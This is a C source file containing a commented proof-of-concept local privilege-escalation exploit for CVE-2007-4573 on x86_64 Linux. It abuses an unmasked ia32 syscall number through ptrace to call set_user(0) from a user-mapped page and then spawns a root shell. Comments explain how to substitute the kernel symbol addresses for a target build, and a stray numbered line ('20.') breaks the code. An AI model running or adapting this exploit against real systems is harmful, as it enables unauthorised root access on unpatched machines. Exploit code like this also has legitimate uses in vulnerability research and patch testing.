// Modified CVE-2007-4573 PoC: x86_64 ia32 syscall emulation did not zero-extend
// %eax after orig_rax was rewritten via ptrace, so a 64-bit syscall number indexes
// ia32_sys_call_table out of bounds. The original author claims this also works on
// 2010-era kernels; that claim is unverified here and the addresses below are
// specific to one kernel build.
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
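/*
 * Kernel-build-specific addresses. Replace these with the values of
 * `ia32_sys_call_table' and `set_user' from /proc/kallsyms or
 * /boot/System.map-$(uname -r) for the target kernel; the defaults
 * are only valid for the build the original author used.
 */
#define syscall_table 0xffffffff8044b8a0UL
#define set_user      0xffffffff8028d785UL

/*
 * The shift below needs a 64-bit long (it is undefined behaviour on
 * ILP32), and the whole technique only exists on x86_64 with ia32
 * emulation, so refuse to build anywhere else.
 */
#if !defined(__LP64__) && !defined(_LP64)
#error "CVE-2007-4573 PoC requires a 64-bit long (x86_64 target)"
#endif

/*
 * Syscall "number" poked into orig_rax: zero in the low 32 bits, bit 32
 * set. A fixed kernel masks this back to 0; a vulnerable one uses all
 * 64 bits as the table index.
 */
#define offset        (1UL << 32)

/*
 * Address the kernel reads as ia32_sys_call_table[offset]. The unsigned
 * arithmetic wraps past the end of the address space and lands in the
 * user half, where main() maps a page and plants the set_user pointer.
 */
#define landing       (syscall_table + 8*offset)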
  20.  
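/*
 * Drive the CVE-2007-4573 primitive.
 *
 * Parent: maps a page at `landing` (the user-space address reached when
 * the kernel indexes ia32_sys_call_table with the unmasked 64-bit value
 * `offset`), stores the address of set_user in the slot, then traces the
 * child and rewrites its orig_rax at syscall entry so the vulnerable
 * kernel dispatches through that user-controlled table entry.
 * Child: issues an int $0x80 with %ebx = 0 (first ia32 syscall argument)
 * and then execs a shell.
 *
 * Returns EXIT_FAILURE if any setup step fails, 0 once the detached
 * child has been reaped. Only meaningful on an unpatched x86_64 kernel
 * with ia32 emulation whose symbol addresses match the #defines; on a
 * fixed kernel the poked syscall number is masked to 0 and nothing happens.
 */
int main(void) {
       /*
        * MAP_FIXED: the page must sit exactly where the table lookup lands.
        * The 0xFFF mask and 4096 length assume 4 KiB pages. PROT_EXEC is
        * kept from the original; the kernel only reads a pointer from this
        * page, so it is probably not needed.
        */
       void *page = mmap((void *)(landing & ~0xFFFUL), 4096,
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
       if (page == MAP_FAILED) {
               perror("mmap");
               return EXIT_FAILURE;
       }
       /* The slot the kernel will read as ia32_sys_call_table[offset]. */
       *(unsigned long *)landing = set_user;

       pid_t child = fork();
       if (child < 0) {
               perror("fork");
               return EXIT_FAILURE;
       }
       if (child == 0) {
               if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
                       perror("ptrace(PTRACE_TRACEME)");
                       _exit(EXIT_FAILURE);
               }
               /* Stop ourselves so the parent can attach before the syscall. */
               if (kill(getpid(), SIGSTOP) < 0) {
                       perror("kill");
                       _exit(EXIT_FAILURE);
               }
               /*
                * %ebx is the first ia32 syscall argument (set_user's uid).
                * The parent replaces the syscall number (orig_rax) while we
                * are stopped at this syscall's entry. Clobbers are declared
                * so the compiler keeps nothing live in %eax/%ebx across it.
                */
               __asm__ volatile ("movl $0, %%ebx\n\t"
                                 "int $0x80\n"
                                 : : : "eax", "ebx", "memory");
               execl("/bin/sh", "/bin/sh", (char *)NULL);
               perror("execl");
               _exit(127);
       }

       /* Wait for the SIGSTOP the child sends itself. */
       if (waitpid(child, NULL, 0) < 0) {
               perror("waitpid");
               return EXIT_FAILURE;
       }
       /* Resume until the child's next syscall entry: the int $0x80. */
       if (ptrace(PTRACE_SYSCALL, child, NULL, NULL) < 0) {
               perror("ptrace(PTRACE_SYSCALL)");
               return EXIT_FAILURE;
       }
       if (waitpid(child, NULL, 0) < 0) {
               perror("waitpid");
               return EXIT_FAILURE;
       }
       /* Swap the pending syscall number for the out-of-range offset. */
       if (ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                  (void *)offset) < 0) {
               perror("ptrace(PTRACE_POKEUSER)");
               return EXIT_FAILURE;
       }
       /* Detach so the child runs the syscall, then reap it when the shell exits. */
       if (ptrace(PTRACE_DETACH, child, NULL, NULL) < 0) {
               perror("ptrace(PTRACE_DETACH)");
               return EXIT_FAILURE;
       }
       waitpid(child, NULL, 0);
       return 0;
}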